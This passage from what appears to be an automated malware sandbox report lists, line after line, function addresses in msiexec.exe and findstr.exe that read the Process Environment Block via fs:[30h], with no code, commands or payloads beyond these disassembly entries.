              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAB1FCD mov eax, dword ptr fs:[00000030h]13_2_1FAB1FCD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAB1FCD mov eax, dword ptr fs:[00000030h]13_2_1FAB1FCD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FB03FD7 mov eax, dword ptr fs:[00000030h]13_2_1FB03FD7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA83FC2 mov eax, dword ptr fs:[00000030h]13_2_1FA83FC2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FB3BFC0 mov ecx, dword ptr fs:[00000030h]13_2_1FB3BFC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FB3BFC0 mov eax, dword ptr fs:[00000030h]13_2_1FB3BFC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA7BFD0 mov eax, dword ptr fs:[00000030h]13_2_1FA7BFD0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA7EFD8 mov eax, dword ptr fs:[00000030h]13_2_1FA7EFD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA7EFD8 mov eax, dword ptr fs:[00000030h]13_2_1FA7EFD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA7EFD8 mov eax, dword ptr fs:[00000030h]13_2_1FA7EFD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAAEF28 mov eax, dword ptr fs:[00000030h]13_2_1FAAEF28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FB27F3E mov eax, dword ptr fs:[00000030h]13_2_1FB27F3E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FB3DF2F mov eax, dword ptr fs:[00000030h]13_2_1FB3DF2F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FB0DF10 mov eax, dword ptr fs:[00000030h]13_2_1FB0DF10
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FB01F13 mov eax, dword ptr fs:[00000030h]13_2_1FB01F13
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E602E1 mov eax, dword ptr fs:[00000030h]16_2_02E602E1
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E602E1 mov eax, dword ptr fs:[00000030h]16_2_02E602E1
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E602E1 mov eax, dword ptr fs:[00000030h]16_2_02E602E1
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0F2F8 mov eax, dword ptr fs:[00000030h]16_2_02F0F2F8
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F252E2 mov eax, dword ptr fs:[00000030h]16_2_02F252E2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E492FF mov eax, dword ptr fs:[00000030h]16_2_02E492FF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED mov eax, dword ptr fs:[00000030h]16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E592C5 mov eax, dword ptr fs:[00000030h]16_2_02E592C5
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E592C5 mov eax, dword ptr fs:[00000030h]16_2_02E592C5
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5A2C3 mov eax, dword ptr fs:[00000030h]16_2_02E5A2C3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5A2C3 mov eax, dword ptr fs:[00000030h]16_2_02E5A2C3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5A2C3 mov eax, dword ptr fs:[00000030h]16_2_02E5A2C3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5A2C3 mov eax, dword ptr fs:[00000030h]16_2_02E5A2C3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5A2C3 mov eax, dword ptr fs:[00000030h]16_2_02E5A2C3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7B2C0 mov eax, dword ptr fs:[00000030h]16_2_02E7B2C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7B2C0 mov eax, dword ptr fs:[00000030h]16_2_02E7B2C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7B2C0 mov eax, dword ptr fs:[00000030h]16_2_02E7B2C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7B2C0 mov eax, dword ptr fs:[00000030h]16_2_02E7B2C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7B2C0 mov eax, dword ptr fs:[00000030h]16_2_02E7B2C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7B2C0 mov eax, dword ptr fs:[00000030h]16_2_02E7B2C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7B2C0 mov eax, dword ptr fs:[00000030h]16_2_02E7B2C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7F2D0 mov eax, dword ptr fs:[00000030h]16_2_02E7F2D0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7F2D0 mov eax, dword ptr fs:[00000030h]16_2_02E7F2D0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4B2D3 mov eax, dword ptr fs:[00000030h]16_2_02E4B2D3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4B2D3 mov eax, dword ptr fs:[00000030h]16_2_02E4B2D3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4B2D3 mov eax, dword ptr fs:[00000030h]16_2_02E4B2D3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E602A0 mov eax, dword ptr fs:[00000030h]16_2_02E602A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E602A0 mov eax, dword ptr fs:[00000030h]16_2_02E602A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E652A0 mov eax, dword ptr fs:[00000030h]16_2_02E652A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E652A0 mov eax, dword ptr fs:[00000030h]16_2_02E652A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E652A0 mov eax, dword ptr fs:[00000030h]16_2_02E652A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E652A0 mov eax, dword ptr fs:[00000030h]16_2_02E652A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE62A0 mov eax, dword ptr fs:[00000030h]16_2_02EE62A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE62A0 mov ecx, dword ptr fs:[00000030h]16_2_02EE62A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE62A0 mov eax, dword ptr fs:[00000030h]16_2_02EE62A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE62A0 mov eax, dword ptr fs:[00000030h]16_2_02EE62A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE62A0 mov eax, dword ptr fs:[00000030h]16_2_02EE62A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE62A0 mov eax, dword ptr fs:[00000030h]16_2_02EE62A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE72A0 mov eax, dword ptr fs:[00000030h]16_2_02EE72A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE72A0 mov eax, dword ptr fs:[00000030h]16_2_02EE72A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED92BC mov eax, dword ptr fs:[00000030h]16_2_02ED92BC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED92BC mov eax, dword ptr fs:[00000030h]16_2_02ED92BC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED92BC mov ecx, dword ptr fs:[00000030h]16_2_02ED92BC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED92BC mov ecx, dword ptr fs:[00000030h]16_2_02ED92BC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F192A6 mov eax, dword ptr fs:[00000030h]16_2_02F192A6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F192A6 mov eax, dword ptr fs:[00000030h]16_2_02F192A6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F192A6 mov eax, dword ptr fs:[00000030h]16_2_02F192A6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F192A6 mov eax, dword ptr fs:[00000030h]16_2_02F192A6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8E284 mov eax, dword ptr fs:[00000030h]16_2_02E8E284
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8E284 mov eax, dword ptr fs:[00000030h]16_2_02E8E284
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED0283 mov eax, dword ptr fs:[00000030h]16_2_02ED0283
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED0283 mov eax, dword ptr fs:[00000030h]16_2_02ED0283
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED0283 mov eax, dword ptr fs:[00000030h]16_2_02ED0283
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F25283 mov eax, dword ptr fs:[00000030h]16_2_02F25283
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8329E mov eax, dword ptr fs:[00000030h]16_2_02E8329E
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8329E mov eax, dword ptr fs:[00000030h]16_2_02E8329E
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00274 mov eax, dword ptr fs:[00000030h]16_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00274 mov eax, dword ptr fs:[00000030h]16_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00274 mov eax, dword ptr fs:[00000030h]16_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00274 mov eax, dword ptr fs:[00000030h]16_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00274 mov eax, dword ptr fs:[00000030h]16_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00274 mov eax, dword ptr fs:[00000030h]16_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00274 mov eax, dword ptr fs:[00000030h]16_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00274 mov eax, dword ptr fs:[00000030h]16_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00274 mov eax, dword ptr fs:[00000030h]16_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00274 mov eax, dword ptr fs:[00000030h]16_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00274 mov eax, dword ptr fs:[00000030h]16_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00274 mov eax, dword ptr fs:[00000030h]16_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E54260 mov eax, dword ptr fs:[00000030h]16_2_02E54260
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E54260 mov eax, dword ptr fs:[00000030h]16_2_02E54260
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E54260 mov eax, dword ptr fs:[00000030h]16_2_02E54260
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4826B mov eax, dword ptr fs:[00000030h]16_2_02E4826B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E79274 mov eax, dword ptr fs:[00000030h]16_2_02E79274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E91270 mov eax, dword ptr fs:[00000030h]16_2_02E91270
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E91270 mov eax, dword ptr fs:[00000030h]16_2_02E91270
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1D26B mov eax, dword ptr fs:[00000030h]16_2_02F1D26B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1D26B mov eax, dword ptr fs:[00000030h]16_2_02F1D26B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E49240 mov eax, dword ptr fs:[00000030h]16_2_02E49240
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E49240 mov eax, dword ptr fs:[00000030h]16_2_02E49240
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8724D mov eax, dword ptr fs:[00000030h]16_2_02E8724D
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0B256 mov eax, dword ptr fs:[00000030h]16_2_02F0B256
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0B256 mov eax, dword ptr fs:[00000030h]16_2_02F0B256
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4A250 mov eax, dword ptr fs:[00000030h]16_2_02E4A250
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E56259 mov eax, dword ptr fs:[00000030h]16_2_02E56259
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F25227 mov eax, dword ptr fs:[00000030h]16_2_02F25227
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4823B mov eax, dword ptr fs:[00000030h]16_2_02E4823B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E87208 mov eax, dword ptr fs:[00000030h]16_2_02E87208
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E87208 mov eax, dword ptr fs:[00000030h]16_2_02E87208
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F253FC mov eax, dword ptr fs:[00000030h]16_2_02F253FC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E603E9 mov eax, dword ptr fs:[00000030h]16_2_02E603E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E603E9 mov eax, dword ptr fs:[00000030h]16_2_02E603E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E603E9 mov eax, dword ptr fs:[00000030h]16_2_02E603E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E603E9 mov eax, dword ptr fs:[00000030h]16_2_02E603E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E603E9 mov eax, dword ptr fs:[00000030h]16_2_02E603E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E603E9 mov eax, dword ptr fs:[00000030h]16_2_02E603E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E603E9 mov eax, dword ptr fs:[00000030h]16_2_02E603E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E603E9 mov eax, dword ptr fs:[00000030h]16_2_02E603E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0F3E6 mov eax, dword ptr fs:[00000030h]16_2_02F0F3E6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6E3F0 mov eax, dword ptr fs:[00000030h]16_2_02E6E3F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6E3F0 mov eax, dword ptr fs:[00000030h]16_2_02E6E3F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6E3F0 mov eax, dword ptr fs:[00000030h]16_2_02E6E3F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E863FF mov eax, dword ptr fs:[00000030h]16_2_02E863FF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0B3D0 mov ecx, dword ptr fs:[00000030h]16_2_02F0B3D0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5A3C0 mov eax, dword ptr fs:[00000030h]16_2_02E5A3C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5A3C0 mov eax, dword ptr fs:[00000030h]16_2_02E5A3C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5A3C0 mov eax, dword ptr fs:[00000030h]16_2_02E5A3C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5A3C0 mov eax, dword ptr fs:[00000030h]16_2_02E5A3C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5A3C0 mov eax, dword ptr fs:[00000030h]16_2_02E5A3C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5A3C0 mov eax, dword ptr fs:[00000030h]16_2_02E5A3C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E583C0 mov eax, dword ptr fs:[00000030h]16_2_02E583C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E583C0 mov eax, dword ptr fs:[00000030h]16_2_02E583C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E583C0 mov eax, dword ptr fs:[00000030h]16_2_02E583C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E583C0 mov eax, dword ptr fs:[00000030h]16_2_02E583C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0C3CD mov eax, dword ptr fs:[00000030h]16_2_02F0C3CD
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E733A5 mov eax, dword ptr fs:[00000030h]16_2_02E733A5
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E833A0 mov eax, dword ptr fs:[00000030h]16_2_02E833A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E833A0 mov eax, dword ptr fs:[00000030h]16_2_02E833A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7438F mov eax, dword ptr fs:[00000030h]16_2_02E7438F
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7438F mov eax, dword ptr fs:[00000030h]16_2_02E7438F
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4E388 mov eax, dword ptr fs:[00000030h]16_2_02E4E388
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4E388 mov eax, dword ptr fs:[00000030h]16_2_02E4E388
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4E388 mov eax, dword ptr fs:[00000030h]16_2_02E4E388
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F2539D mov eax, dword ptr fs:[00000030h]16_2_02F2539D
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EA739A mov eax, dword ptr fs:[00000030h]16_2_02EA739A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EA739A mov eax, dword ptr fs:[00000030h]16_2_02EA739A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E48397 mov eax, dword ptr fs:[00000030h]16_2_02E48397
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E48397 mov eax, dword ptr fs:[00000030h]16_2_02E48397
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E48397 mov eax, dword ptr fs:[00000030h]16_2_02E48397
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EF437C mov eax, dword ptr fs:[00000030h]16_2_02EF437C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E57370 mov eax, dword ptr fs:[00000030h]16_2_02E57370
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E57370 mov eax, dword ptr fs:[00000030h]16_2_02E57370
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E57370 mov eax, dword ptr fs:[00000030h]16_2_02E57370
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0F367 mov eax, dword ptr fs:[00000030h]16_2_02F0F367
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1A352 mov eax, dword ptr fs:[00000030h]16_2_02F1A352
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED2349 mov eax, dword ptr fs:[00000030h]16_2_02ED2349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4D34C mov eax, dword ptr fs:[00000030h]16_2_02E4D34C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4D34C mov eax, dword ptr fs:[00000030h]16_2_02E4D34C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED035C mov eax, dword ptr fs:[00000030h]16_2_02ED035C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED035C mov eax, dword ptr fs:[00000030h]16_2_02ED035C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED035C mov eax, dword ptr fs:[00000030h]16_2_02ED035C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED035C mov ecx, dword ptr fs:[00000030h]16_2_02ED035C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED035C mov eax, dword ptr fs:[00000030h]16_2_02ED035C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED035C mov eax, dword ptr fs:[00000030h]16_2_02ED035C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F25341 mov eax, dword ptr fs:[00000030h]16_2_02F25341
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E49353 mov eax, dword ptr fs:[00000030h]16_2_02E49353
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E49353 mov eax, dword ptr fs:[00000030h]16_2_02E49353
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7F32A mov eax, dword ptr fs:[00000030h]16_2_02E7F32A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E47330 mov eax, dword ptr fs:[00000030h]16_2_02E47330
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1132D mov eax, dword ptr fs:[00000030h]16_2_02F1132D
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1132D mov eax, dword ptr fs:[00000030h]16_2_02F1132D
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8A30B mov eax, dword ptr fs:[00000030h]16_2_02E8A30B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8A30B mov eax, dword ptr fs:[00000030h]16_2_02E8A30B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8A30B mov eax, dword ptr fs:[00000030h]16_2_02E8A30B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED930B mov eax, dword ptr fs:[00000030h]16_2_02ED930B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED930B mov eax, dword ptr fs:[00000030h]16_2_02ED930B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED930B mov eax, dword ptr fs:[00000030h]16_2_02ED930B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4C310 mov ecx, dword ptr fs:[00000030h]16_2_02E4C310
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E70310 mov ecx, dword ptr fs:[00000030h]16_2_02E70310
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E750E4 mov eax, dword ptr fs:[00000030h]16_2_02E750E4
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E750E4 mov ecx, dword ptr fs:[00000030h]16_2_02E750E4
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4A0E3 mov ecx, dword ptr fs:[00000030h]16_2_02E4A0E3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E580E9 mov eax, dword ptr fs:[00000030h]16_2_02E580E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4C0F0 mov eax, dword ptr fs:[00000030h]16_2_02E4C0F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E920F0 mov ecx, dword ptr fs:[00000030h]16_2_02E920F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov ecx, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov ecx, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov ecx, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov ecx, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
